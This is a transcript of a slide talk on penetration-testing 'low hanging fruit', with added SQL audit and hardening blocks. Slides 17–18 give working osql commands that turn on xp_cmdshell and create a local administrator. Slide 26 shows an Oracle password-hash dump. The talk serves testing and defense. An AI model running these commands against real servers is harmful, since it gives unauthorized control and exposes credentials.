
The Low Hanging Fruit of Penetration Testing Presented by: Bryan Miller


Presentation Transcript


  1. The Low Hanging Fruit of Penetration Testing Presented by: Bryan Miller

  2. AGENDA
     • Pen Testing vs. VA vs. Risk Assessments
     • Penetration Testing Concepts/Issues
     • What is Low Hanging Fruit
     • Low Hanging Fruit Examples
     • Wrap Up

  3. B.S. I.S., M.S. C.S. – Virginia Commonwealth University
     • Current CISSP, former Banyan CBE & Cisco CCIE
     • Former adjunct professor – I.S. & C.S. – VCU
     • ISSA, ISACA, IALR and VA SCAN lecturer
     • Penetration testing for 11+ years
     • Published author with 25 years in I.T.

  4. Penetration Testing vs. Vulnerability Assessments vs. Risk Assessments

  5. • Penetration Testing
       • Tests for actual vulnerabilities and what can be exploited
       • Value add comes from putting the pieces together
     • Vulnerability Assessment
       • Reports on potential vulnerabilities without testing them
       • Assigns risk values to each issue
     • Risk Assessment
       • More analytical and less technical
       • Great for overviews but IMHO it will never catch LHF

  6. Penetration Testing Concepts/Issues

  7. Types of testing
     • External
       • Testing from outside the security perimeter (firewall)
       • Internet, dial-in, wireless, physical & social engineering
       • Usually performed in a black-box approach w/no credentials

  8. Types of testing
     • Internal
       • What is accessible inside the security perimeter
       • White-box or black-box depending on goals
       • Tests for effects of automated malicious software

  9. Issues - Requirements definition
     • Do you need a penetration test, VA or risk assessment?
       • Sometimes you may need more than one
     • What is the ultimate goal of the test?
       • Physical → Test security cameras, locks and alarms
       • Social Engineering → Test HR policies and procedures
       • Vulnerability Assessment → Patch scan
     • How do you define success?
       • How do you know if the test succeeded or failed?
       • Sometimes difficult to define for a penetration test

  10. Issues - In-house or outsourced?
     • In-house
       • Keeping qualified staff happy is a tough job
       • Tools and training can be very expensive
       • Sometimes you just need an unbiased 2nd opinion
     • Outsourced
       • How do you judge competency?
       • Do they have a methodology, tool list, references?
       • Do they outsource their work?
       • Geography/vertical market coverage

  11. Issues
     • Deliverables
       • Will the report include specific recommendations?
       • Is there tool output for verification?
       • No boilerplate text!
     • Remediation
       • If you don’t plan on fixing the issues, don’t waste the time or money performing the tests
     • Post-remediation testing
       • Critical to ensure that all issues have been resolved

  12. What is Low Hanging Fruit?

  13. The Low Hanging Fruit Top Ten
     • Permissions on data resources
     • Employee security awareness
     • Encryption
     • Policies & procedures
     • Physical security

  14. The Low Hanging Fruit Top Ten
     • Password management
     • Default security controls
     • OS and application patches
     • SQL Injection, XSS, URL issues
     • Wireless access points/modems

  15. Low Hanging Fruit Examples

  17. Fun with Microsoft SQL
     • Turn on “xp_cmdshell” if it’s disabled
       • osql -S10.1.1.1 -U sa -P pwd -Q"EXECUTE master.dbo.sp_configure 'show advanced options', 1"
       • osql -S10.1.1.1 -U sa -P pwd -Q"RECONFIGURE"
       • osql -S10.1.1.1 -U sa -P pwd -Q"EXECUTE master.dbo.sp_configure 'xp_cmdshell', 1"
       • osql -S10.1.1.1 -U sa -P pwd -Q"RECONFIGURE"

  18. More Fun with Microsoft SQL
     • Add administrative user
       • osql -S10.1.1.1 -U sa -P pwd -Q"EXECUTE xp_cmdshell 'net user bmiller passwd /add'"
       • osql -S10.1.1.1 -U sa -P pwd -Q"EXECUTE xp_cmdshell 'net localgroup administrators bmiller /add'"
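A defender-side check for what slides 17 and 18 rely on, added here and not part of the presentation: it reads the current xp_cmdshell setting, turns it off, and lists the logins that could turn it back on. It assumes a sysadmin connection; sys.configurations, sp_configure, sys.server_role_members, sys.server_principals and sys.sql_logins are standard SQL Server catalog objects.

```sql
-- Added example (not from the slides): audit and disable xp_cmdshell.

-- 1. What is the server currently set to? value_in_use is the live setting;
--    'show advanced options' = 1 means someone has already walked the path on slide 17.
SELECT name, value, value_in_use
FROM   sys.configurations
WHERE  name IN ('show advanced options', 'xp_cmdshell');

-- 2. Disable the shell. Each sp_configure change takes effect only after RECONFIGURE,
--    and xp_cmdshell is an advanced option, so it must be made visible first.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 3. Who can re-enable it? sp_configure needs ALTER SETTINGS, which the
--    sysadmin and serveradmin fixed roles carry. Every member listed here is
--    effectively an OS administrator of the host, as slide 18 shows.
SELECT r.name AS server_role, m.name AS login_name, m.type_desc
FROM   sys.server_role_members rm
JOIN   sys.server_principals r ON r.principal_id = rm.role_principal_id
JOIN   sys.server_principals m ON m.principal_id = rm.member_principal_id
WHERE  r.name IN ('sysadmin', 'serveradmin')
ORDER  BY r.name, m.name;

-- 4. The slides' path starts from the built-in sa login with a guessable password.
--    sa always has SID 0x01, even when renamed; it should be disabled or, if it must
--    exist, renamed with a strong password and password policy enforced.
SELECT name, is_disabled, is_policy_checked
FROM   sys.sql_logins
WHERE  sid = 0x01;

-- Remediation when sa is still enabled (placeholder password, choose your own):
-- ALTER LOGIN sa DISABLE;
-- ALTER LOGIN sa WITH PASSWORD = '<strong-password>', CHECK_POLICY = ON;
```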

  19. The Trouble with VNC

  20. There are many ways to get the VNC password hashes…

  26. Fun with Oracle
     • Dumping password hashes – non-privileged account
       • Logged in as “dbsnmp”, we ran the following query:
       • select username, password from dba_users;
         DBSNMP AE1E40C725DFCAC8
         AQADMIN 739EF27E22AC39DC
         SYS C10A280B9CFF9A72
         SYSTEM 04D19DEFD642AF20

  27. Ran CheckPWD:
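The two conditions behind slides 26 and 27 are a monitoring account that can read DBA_USERS and accounts still on their vendor default password. The following audit, added here and not part of the presentation, checks both from a DBA session; the views used are standard Oracle data-dictionary views, and DBA_USERS_WITH_DEFPWD requires Oracle 11g or later.

```sql
-- Added example (not from the slides): Oracle checks for the slide-26 findings.

-- 1. Accounts still using a vendor default password. This is the same check
--    CheckPWD performs offline against dumped hashes, done online instead.
SELECT username
FROM   dba_users_with_defpwd
ORDER  BY username;

-- 2. Who can read the data dictionary and therefore DBA_USERS? DBSNMP normally
--    holds the OEM_MONITOR role, which carries SELECT ANY DICTIONARY; that is how a
--    "non-privileged" login produced the hash list on slide 26.
--    Note: from 11g the PASSWORD column of DBA_USERS is empty (hashes live only in
--    SYS.USER$), so the slide-26 query returns no hashes, but the grants still matter.
SELECT grantee, privilege AS grant_name
FROM   dba_sys_privs
WHERE  privilege IN ('SELECT ANY DICTIONARY', 'SELECT ANY TABLE')
UNION ALL
SELECT grantee, granted_role
FROM   dba_role_privs
WHERE  granted_role IN ('DBA', 'SELECT_CATALOG_ROLE', 'OEM_MONITOR')
UNION ALL
SELECT grantee, 'SELECT ON ' || owner || '.' || table_name
FROM   dba_tab_privs
WHERE  table_name = 'DBA_USERS'
ORDER  BY 1;

-- 3. Open accounts, to spot installed-but-unused ones (e.g. AQADMIN on slide 26)
--    that should be locked rather than left with a default password.
SELECT username, account_status, profile
FROM   dba_users
WHERE  account_status = 'OPEN'
ORDER  BY username;

-- Remediation (placeholders: substitute the account and a strong password):
-- ALTER USER <unused_account> ACCOUNT LOCK PASSWORD EXPIRE;
-- ALTER USER dbsnmp IDENTIFIED BY "<strong-password>";
```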

  28. Reboot via Compaq Insight Manager (CIM)

  34. Appliances are not immune…

  35. Downloaded passwd, shadow, host files

  45. Looks like we can request any file?

  46. OK, we’ll ask for the password file. Next up, JTR!

  47. This is why PCI doesn’t allow WEP

  48. What the fake telephone repairman saw…

  49. The danger of scripts lying around…

  50. Wrap-Up
